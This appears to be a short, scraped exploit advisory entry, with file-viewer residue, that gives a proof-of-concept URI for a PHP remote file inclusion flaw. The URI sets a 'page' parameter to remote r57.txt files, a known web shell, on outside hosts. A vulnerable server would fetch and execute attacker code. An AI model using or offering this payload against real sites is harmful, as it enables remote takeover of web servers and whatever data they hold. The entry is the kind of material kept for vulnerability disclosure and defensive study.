5 lines
No EOL
259 B
Text
Executable file
5 lines
No EOL
259 B
Text
Executable file
An attacker can exploit this issue via a browser.
|
|
|
|
The following proof-of-concept URI is available:
|
|
|
|
http://www.example.com/index.php?page=http://www.example2.com/r57.txt?http://www.goodayelinks.com/index.php?page=http://www.nykola.ch/Sefirot_r0x/r57.txt? |